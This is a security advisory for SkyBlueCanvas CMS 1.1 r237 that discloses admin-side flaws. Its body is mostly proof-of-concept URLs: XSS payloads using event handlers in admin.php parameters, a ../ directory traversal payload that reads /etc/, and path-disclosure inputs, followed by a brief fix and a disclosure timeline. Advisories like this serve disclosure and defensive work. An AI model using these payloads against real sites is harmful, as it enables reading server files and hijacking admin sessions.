SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Credit: InterNOT
Risk: Medium
Local: No
Remote: Yes

SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities Version Affected: 1.1 r237 (newest version: 1.1 r246) Info: SkyBlueCanvas Lightweight CMS is an open source, free content management system written in php and built specifically for small web sites. The entire site you are viewing is a demonstration of the SkyBlueCanvas lightweight CMS. SkyBlueCanvas is custom-built for those instances when more robust systems like Joomla, WordPress and Drupal are too much horsepower. Credits: InterN0T External Links: -:: The Advisory ::- Vulnerable Function / ID Calls: mgroup, mgr, objtype, id & dir. Cross Site Scripting: (requires administrator access - will not survive a login screen) http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2 http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager Impossible XSS: (XML errors or hidden tags preventing use of event handlers.) http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS http://[HOST]skybluecanvas/admin.php?mgroup=settings&mgr=configuration&o bjtype=">XSS http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page &sub=editpage&id=" onfocus=alert(0) > http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS Path Content Disclosure: (requires admin privileges) http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../.. /../../../../../etc/ -- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/ --=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw. Path Disclosure: (requires admin privileges) http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype= media&dir=all&sub=move&id=' http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype= media&dir=all&sub=rename&id=' -:: Solution ::- Filter event handlers out from function calls. Conclusion: Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable. Reference: s-1-1-r237-multiple-vulnerabilities.html Disclosure Information: - Vulnerabilities found, researched and confirmed between 5th to 10th June. - Advisory finished and published on InterN0T the 12th June. - Vendor and Buqtraq (SecurityFocus) contacted the 12th June. All of the best, MaXe

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top